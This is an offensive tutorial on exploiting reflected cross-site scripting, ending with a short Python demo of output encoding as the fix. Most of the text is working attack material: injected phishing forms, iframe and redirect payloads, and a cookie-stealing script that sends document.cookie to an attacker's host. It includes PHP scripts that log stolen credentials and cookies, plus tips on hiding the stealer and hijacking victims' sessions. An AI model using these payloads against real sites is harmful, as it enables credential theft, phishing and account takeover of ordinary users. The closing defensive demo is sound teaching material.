How to hack using Cross Site Scripting (XSS)



What is XSS?

XSS stands for Cross Site Scripting (the abbreviation XSS is used rather than CSS to avoid confusion with Cascading Style Sheets) and is one of the most common web application vulnerabilities. It is about injecting script or HTML into an input that a vulnerable site reflects back into its pages without filtering or encoding it, so the victim's browser simply runs the attacker's code as if it were part of the trusted site. That code can be a phishing form, a cookie stealer or anything else that harms the user's privacy.

How to use the XSS technique?

To use it, put the payload into a search box or any other vulnerable input that the site embeds into its HTML response, so that it is executed when the page is rendered in the victim's browser. The examples below show the payload unencoded in the URL for readability; a link you actually send must be URL-encoded (< as %3C, > as %3E, space as %20 and so on), otherwise parts of it get mangled on the way. Here are some attack techniques you can carry out with an XSS flaw:

1.) Phishing script injection:
Just inject a fake login form ('User' and 'Password' fields wrapped in <html> and <body> tags) so that the victim thinks he needs to log in to the target site. The form posts to a script on your own server that writes the credentials to a file.

Here is an example:

 www.site.ru/google.php?search=<html><body><head><meta content="text/html; charset=utf-8"></meta></head>
  <div style="text-align: center;"><form Method="POST" Action="http://www.phishingsite.ru/phishingscript.php">
  Phishingpage :<br /><br/>Username :<br /> <input name="User" /><br />Password :<br /> 
  <input name="Password" type="password" /><br /><br /><input name="Valid" value="Ok !" type="submit" />
  <br /></form></div></body></html>
Content of phishingscript.php (the field names must match the input names in the injected form, and PHP array keys are case-sensitive):
<?php
// Receives the POST from the injected form and appends the credentials to log.txt
$login    = isset($_POST['User']) ? $_POST['User'] : '';
$password = isset($_POST['Password']) ? $_POST['Password'] : '';
$open = fopen('log.txt', 'a+');
// <br /> tags so the log reads nicely when opened in a browser; "\n" is a real newline
fputs($open, 'Username : ' . $login . '<br />' . "\n" . 'Password : ' . $password . '<br /><br />' . "\n");
fclose($open);
?>

2.) Iframe phishing:
Simple thing, just inject an iframe (plain HTML, no JavaScript needed) in which your phishing site is embedded.
Obviously it needs to look just like the target site.

Here is an example:

www.site.ru/google.php?search=<iframe src="http://www.yourphishingsite.ru" height="100%" width="100%"></iframe>
(Note: height="100%" width="100%" means that the whole window is filled with that iframe, while the address bar still shows the trusted site.)
The target site will spawn your phishing site in an iframe, and the site's users / victims won't see a
difference and will log in (if they are careless enough).

3.) Redirection phishing:
Also simple, just inject a JavaScript (or meta refresh) redirection that leads to your phishing site; of course it needs to look just like the target site.
Here is an example:

 www.site.ru/google.php?search=<script>document.location.href="http://www.yourphishingsite.ru"</script>
or
  www.site.ru/google.php?search=<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://www.yourphishingsite.ru">

4.) Cookie stealing:
One of the most feared consequences of an XSS flaw is the cookie stealing attack. In this method you place cookiestealer.php on your own host, then inject JavaScript into the target website that sends document.cookie to it. Note that document.cookie only exposes cookies set without the HttpOnly flag; a session cookie marked HttpOnly cannot be read this way, although the phishing attacks above still work.
Content of cookiestealer.php (found somewhere with Google):

<?php
// Appends the cookie string passed in ?cookie= to log.txt
$cookie = isset($_GET['cookie']) ? $_GET['cookie'] : '';   // $HTTP_GET_VARS was removed in PHP 5.4
$file = fopen('log.txt', 'a');
fwrite($file, $cookie . "\n\n");   // double quotes so \n is a real newline
fclose($file);
?>

Save it as cookiestealer.php, create an empty 'log.txt' and upload both files
to your own webspace in the same directory; make log.txt writable by the web server ("chmod 777" is the quick way, though 666 on log.txt alone is enough).
Inject the following code into your target website:

  http://www.site.ru/google.php?search=<script>location.href = 'http://phishingsite.ru/cookiestealer.php?cookie='+document.cookie;</script>

Then the cookie of every victim (a user of the target site who visits the URL above) should
appear in log.txt. If a cookie value contains characters such as & or #, write encodeURIComponent(document.cookie) in the payload instead so the whole string survives the query string.
Now you simply need to set that cookie in your own browser (e.g. with the Live HTTP Headers Firefox add-on or the browser's developer tools) when requesting the target site,
and you are logged in as the victim for as long as the session is valid.

Obviously you need to replace
  http://www.yourphishingsite.ru
with the URL of your phishing site.
PROTIP: rename your 'cookiestealer.php' to something like 'turtles.php';
this looks less suspicious.
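The mechanism behind all four techniques above is the same: google.php echoes the search parameter into its HTML without encoding it. The following script is an added example, not code from the original tutorial, that simulates such a reflected search page next to a hardened version (HTML-encoding the value on output), feeds it the tutorial's payloads through a properly URL-encoded link, and checks which version still contains live markup. The vulnerable site is simulated in Python rather than PHP, the function names are hypothetical, the phishing form is shortened from section 1, and the URLs are the tutorial's own placeholders.

```python
# Added example (not part of the original tutorial): a reflected search page
# like "google.php?search=" beside its hardened form, driven by the payloads
# from sections 1-4. All function names are hypothetical.
import html
from urllib.parse import urlencode, urlparse, parse_qs

# The tutorial's payloads (the phishing form is shortened to its essentials).
PAYLOADS = {
    "phishing_form": ('<form method="POST" action="http://www.phishingsite.ru/phishingscript.php">'
                      'Username: <input name="User" /> Password: '
                      '<input name="Password" type="password" />'
                      '<input type="submit" value="Ok !" /></form>'),
    "iframe_phishing": '<iframe src="http://www.yourphishingsite.ru" height="100%" width="100%"></iframe>',
    "redirect_phishing": '<script>document.location.href="http://www.yourphishingsite.ru"</script>',
    "meta_refresh": '<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://www.yourphishingsite.ru">',
    "cookie_stealing": ("<script>location.href = 'http://phishingsite.ru/cookiestealer.php?cookie='"
                        "+document.cookie;</script>"),
}


def build_attack_url(base, payload):
    """Percent-encode the payload into the search parameter, which is what a
    link sent to a victim must look like (the tutorial shows it unencoded)."""
    return base + "?" + urlencode({"search": payload})


def search_param(url):
    """What the server sees after decoding the query string."""
    return parse_qs(urlparse(url).query).get("search", [""])[0]


def render_vulnerable(query):
    # The bug: the parameter is concatenated straight into the HTML.
    return f"<html><body><h1>Results for: {query}</h1></body></html>"


def render_hardened(query):
    # The fix: encode &, <, >, " and ' before the value reaches the page,
    # so the browser treats it as text rather than markup.
    return f"<html><body><h1>Results for: {html.escape(query, quote=True)}</h1></body></html>"


def has_live_markup(page):
    """Crude demo check: does the rendered page still contain one of the
    tags the tutorial's payloads rely on?"""
    lower = page.lower()
    return any(tag in lower for tag in ("<script", "<iframe", "<form", "<meta"))


def demo():
    """Map each payload name to (vulnerable page executes it, hardened page executes it)."""
    results = {}
    for name, payload in PAYLOADS.items():
        url = build_attack_url("http://www.site.ru/google.php", payload)
        q = search_param(url)  # round-trips the payload exactly
        results[name] = (has_live_markup(render_vulnerable(q)),
                         has_live_markup(render_hardened(q)))
    return results


if __name__ == "__main__":
    for name, (vuln, hard) in demo().items():
        print(f"{name:18s} vulnerable={vuln} hardened={hard}")
```

Every payload survives the URL round trip and lands live in the vulnerable page, while the hardened page still shows the query text (the victim sees "<script>..." as literal characters) but executes none of it. Output encoding at the point of reflection is the fix for this whole class; filtering on input alone tends to miss one of the five variants above.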